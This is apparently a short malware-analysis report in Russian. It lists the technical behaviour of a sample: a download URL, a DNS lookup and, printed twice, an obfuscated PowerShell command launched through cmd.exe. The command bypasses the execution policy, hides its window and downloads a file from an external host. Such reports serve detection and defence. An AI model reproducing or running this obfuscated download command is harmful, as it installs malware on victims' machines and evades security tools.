Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoW^Er^shEL^l^.E^xE^ ^-EXec^UtIoNPO^LI^Cy^ By^pasS -^N^Op^roF^iLe^ ^-WIN^dowsTYle h^I^DdeN ^(NeW^-^ObJEcT ^SySTeM^.nEt^.WE^bc^Lient)^.DowN^lOAd^f^il^e('http://flowers-my.wang/sear...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "PoW^Er^shEL^l^.E^xE^ ^-EXec^UtIoNPO^LI^Cy^ By^pasS -^N^Op^roF^iLe^ ^-WIN^dowsTYle h^I^DdeN ^(NeW^-^ObJEcT ^SySTeM^.nEt^.WE^bc^Lient)^.DowN^lOAd^f^il^e('http://flowers-my.wang/sear...' (со скрытым окном)